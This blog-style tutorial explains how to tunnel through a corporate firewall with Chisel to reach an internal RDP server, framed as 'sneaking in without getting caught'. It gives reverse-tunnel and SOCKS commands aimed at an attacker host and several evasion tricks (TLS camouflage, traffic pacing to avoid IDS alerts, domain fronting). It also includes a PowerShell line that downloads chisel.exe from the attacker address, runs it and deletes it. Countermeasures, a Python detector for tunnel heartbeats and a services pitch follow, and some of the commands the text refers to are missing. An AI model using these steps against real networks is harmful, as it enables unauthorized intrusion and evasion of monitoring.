
Bypassing Corporate Firewalls with Chisel for RDP Access

Scenario Overview:

A corporate network restricts inbound connections but allows outbound traffic (e.g., HTTP, HTTPS). We need to access an internal RDP (3389) server behind the firewall from an external attacker-controlled machine.

Constraints:

  • Firewall blocks inbound RDP, SSH, and VPN.

  • Only outbound HTTP/HTTPS is allowed.

  • Direct reverse shells are detected.

Sneaking in without getting caught, when it’s not allowed: Chisel (TCP/HTTP Tunneling)

Chisel creates an encrypted tunnel over allowed protocols (HTTP/WebSockets), bypassing firewall restrictions.

Step-by-Step Exploitation

1. Set Up the Chisel Server (Attacker Machine)

On the attacker machine (public IP: 10.10.10.10), start the Chisel server in reverse mode (to allow victim-initiated connections):


  • Listens on port 8080 (HTTP-friendly to evade detection).

  • --reverse ensures ports are opened on the server (attacker) rather than the client (victim).


2. Victim Machine (Internal Network) Connects Back

On the internal Windows machine (behind the firewall), run:

./chisel client 10.10.10.10:8080 R:3389:localhost:3389

If you look back at the attacker machine, it is now listening on the forwarded port for the victim’s device:


We now have access to the victim’s RDP service.

If we want a full connection, we can use Chisel’s SOCKS feature.


We can use proxychains to run our own tools (or malware) against the victim’s machine through the SOCKS proxy. To do this, we tunnel nmap through the proxy with proxychains so that we can scan the internal network.


As you can see, Chisel is a very effective and stealthy tool for reaching restricted corporate networks where active firewall rules allow only outbound connections and no inbound ones, and where traditional techniques such as reverse shells or aggressive scanning would likely get you detected.

Advanced Evasion Techniques & Detection Methods for Chisel Tunneling


Evasion Techniques (Making Chisel Stealthier)

1. Protocol Camouflage


Chisel can tunnel over HTTP/HTTPS, WebSockets, or SSH, but deeper evasion is possible:


Use HTTPS Instead of Raw TCP:


./chisel server --host mylegitdomain.com --port 443 --reverse --tls-key key.pem --tls-cert cert.pem

  • Hides within legitimate web traffic.

  • Requires a valid TLS certificate (can use Let’s Encrypt or self-signed if strict validation is absent).


WebSocket Tunneling (Less Noisy Than Raw TCP):

./chisel server -p 443 --reverse --proxy http://proxy.corp.com

Appears as normal WebSocket traffic. WebSockets are common in web apps: they are used wherever there is a live chat feature or any other real-time data transfer, especially in mission-critical application features.


2. Traffic Obfuscation

  • Use --socks5 Instead of Raw Port Forwarding:

    • SOCKS5 is harder to distinguish from regular proxy traffic.

    • Many enterprises allow outbound SOCKS for internal tools.

  • Slow Down Traffic to Mimic Legitimate Patterns:

./chisel client 10.10.10.10:8080 R:3389:localhost:3389 --timeout 5s --keepalive 30s

  • Avoids bursty traffic patterns that trigger IDS alerts.

3. Fileless Execution (Avoiding Disk Writes)

Download Chisel to a temporary location and execute it straight away (note that the binary still touches disk briefly, so this is not truly in-memory execution):


iwr http://10.10.10.10/chisel.exe -OutFile $env:TEMP\chisel.exe; 
& $env:TEMP\chisel.exe client 10.10.10.10:8080 R:3389:localhost:3389

Delete immediately after execution:

rm $env:TEMP\chisel.exe -Force

4. Domain Fronting (If Cloud Services Are Allowed)

  • Route Traffic Through Legit CDNs (Cloudflare, Akamai):

    ./chisel server --host myrealcdn.cloudfront.net --port 443 --reverse

Countermeasures (Stopping Chisel in Enterprise Networks)

1. Network Hardening

  • Block Outbound Traffic to Uncommon Ports (8080, 4444, etc.).

  • Allow Only Whitelisted Domains (prevent callbacks to attacker servers).

2. Endpoint Controls

  • Restrict Unauthorized Executables (AppLocker/PowerShell Constrained Mode).

  • Monitor Temporary File Creation (C:\Windows\Temp\, $env:TEMP).

3. Behavioral Analysis

  • Alert on Rapid Succession of Network Connections (Chisel heartbeat traffic).

  • Detect Local Port Forwarding (e.g., netsh interface portproxy).
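One way to implement the behavioral check above, as an added example that is not part of the original post: a small Python detector run over constructed proxy-log lines (the log format, hosts and timestamps are assumed for the demo) that flags a source host contacting the same destination at a near-constant interval, which is what a tunnel client’s keepalive or reconnect cadence looks like next to ordinary browsing.

```python
# Added example, not from the original post: flag outbound connections whose
# timing looks like a tunnel keepalive/reconnect beat rather than browsing.
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

# Constructed proxy log: "<ISO time> <src_ip> <dst_host:port> <method> <upgrade>"
# Host .15 contacts one destination every 30 s (the page's --keepalive 30s);
# host .22 makes irregular requests to a CDN, as a browser would.
SAMPLE_LOG = """\
2024-05-01T09:00:00 192.168.10.15 10.10.10.10:8080 GET websocket
2024-05-01T09:00:30 192.168.10.15 10.10.10.10:8080 GET websocket
2024-05-01T09:01:00 192.168.10.15 10.10.10.10:8080 GET websocket
2024-05-01T09:01:30 192.168.10.15 10.10.10.10:8080 GET websocket
2024-05-01T09:02:00 192.168.10.15 10.10.10.10:8080 GET websocket
2024-05-01T09:00:07 192.168.10.22 cdn.example.com:443 GET -
2024-05-01T09:03:41 192.168.10.22 cdn.example.com:443 GET -
2024-05-01T09:12:05 192.168.10.22 cdn.example.com:443 GET -
2024-05-01T09:12:09 192.168.10.22 cdn.example.com:443 GET -
"""

def parse_log(text):
    """Group log lines by (src, dst); each value is a list of (time, upgrade)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, _method, upgrade = line.split()
        flows[(src, dst)].append((datetime.fromisoformat(ts), upgrade))
    return flows

def find_heartbeats(text, min_events=4, max_jitter=2.0):
    """Return (src, dst, mean_interval_s, all_websocket) for every flow with
    at least min_events contacts whose gaps vary by <= max_jitter seconds.
    Low jitter over several events is the beacon-like pattern; browsing
    produces bursty, irregular gaps and is left alone."""
    hits = []
    for (src, dst), events in parse_log(text).items():
        if len(events) < min_events:
            continue
        times = sorted(t for t, _ in events)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if pstdev(gaps) <= max_jitter:
            websocket = all(u == "websocket" for _, u in events)
            hits.append((src, dst, round(sum(gaps) / len(gaps), 1), websocket))
    return hits

if __name__ == "__main__":
    for src, dst, interval, ws in find_heartbeats(SAMPLE_LOG):
        print(f"{src} -> {dst}: every {interval}s, websocket={ws}")
```

Tune min_events and max_jitter to your environment; a long-lived WebSocket upgrade to a single non-allowlisted host is worth an alert on its own even before the cadence check fires.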


Comprehensive protection requires layered security controls. For organizations needing tailored defense solutions, I offer:

Enterprise-Grade Countermeasures

  1. Custom Network Traffic Profiling

    • Behavioral analysis of encrypted HTTP/WebSocket traffic

    • Machine learning models tuned to organization’s specific environment

  2. Active Counter-Tunneling Systems

    • Real-time tunnel disruption technology

    • Protocol-level interference for unauthorized proxies

  3. Hardened Endpoint Protection

    • Memory-based execution monitoring

    • Weaponized decoy tunnels for attacker identification

  4. Live Threat Hunting

    • 24/7 SOC monitoring for tunnel artifacts

    • Attack surface reduction through micro-segmentation
